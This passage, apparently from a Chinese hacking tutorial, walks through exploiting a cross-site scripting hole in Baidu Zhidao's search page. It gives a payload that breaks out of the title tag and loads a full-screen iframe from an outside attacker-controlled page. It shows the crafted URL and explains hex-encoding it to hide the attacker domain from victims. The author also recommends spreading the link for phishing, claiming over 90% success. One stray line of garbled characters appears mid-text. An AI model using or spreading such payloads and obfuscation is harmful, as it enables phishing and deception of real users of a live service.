全面解析百度XSS跨站漏洞

让前面一个title提前结束即可，而后面的那个</title>因为它没有了标签的前一部分当然就不能执行了，所以也就对我们没有过滤效果了，输入上面的关键字后我们点击搜索，跨站成功了，如图3

跨站成功了，而且百度还给出了包含我们跨站代码的URL，这下就好办多了，我们就可以去外面传播这个跨站效果页了！ 但走到这一步并没完，因为注意到没有，跨点最终是在title标签中，一个HTML网页，IE解读它的顺为就是自上而下，而title就是标题当然是在最前面的，既然是这样那么我们就有思路了，我们设想，如果我们用iframe跨站，当然你也可以说这是挂马或钓鱼，但请注意这里仅仅是学习技术，我们可以将iframe代码中的width和height值分别设成1024，当然这里只要对width设得一定要超过或等于1024，而height大于或等于768就行了，因为我们电脑全屏的最小就是这个数，而同时我们在另一个空间上做一个黑页，地址放入iframe代码中,设想我们这样设置后的效果，访问我们的URL，打开后我们看到的是整页的黑页，菜鸟还不以为百度被拿到SHELL了，看我测试，我在www.zmke.com的空间上做了一个hack.html的黑页，然后我们将</title><iframe src=http://www.zmke.com/hack.html width=1024 height=888></iframe>把它们当作关键字输入到baidu知道的搜索框内，点击搜索，然后看到效果果然如我们所想，如图4所示！

同时我们在地址栏得到了我们的URL：http://zhidao.baidu.com/q?word=%3C%2Ftitle%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.zmke.com%2Fhack.html+width%3D1024+height%3D888%3E%3C%2Fiframe%3E&ct=17&pn=0&tn=ikaslist&rn=10

当然这个URL被IE自动进行了简单的URL编码，但并没有编完全，因为www.zmke.com 清析可见，这样不就漏馅不吗？于是我们可以再次对这个usrl进行编码，当然上面的url的完代码形式是:密完全的代码进行16进制再次加密，这里留下一个ASCII编码表地址：

http://bbs.xaqd.net/read.php?tid=112，简单说一下如何加密，加密的时候请注意只加密word=<title以后和&ct=17&pn=0&tn=ikaslist&rn=10之前的代码，在ASCII表中比如空格是20那么我们在URL编码的时候只要将20换成%20即可！这个漏洞是相当严重的，因为它出现了title标签中，试想，如果 F8CDV#B r  

http://www.zmke.com/hack.html是个钓鱼页，那么我想上钓率90%以上问题不大，相比passport用户名输入栏漏洞它高明多了，如果用前一个用iframe无法做到整屏完全是黑页的，因为它并不是首先被解析的。

上一页  [1] [2] [3] 下一页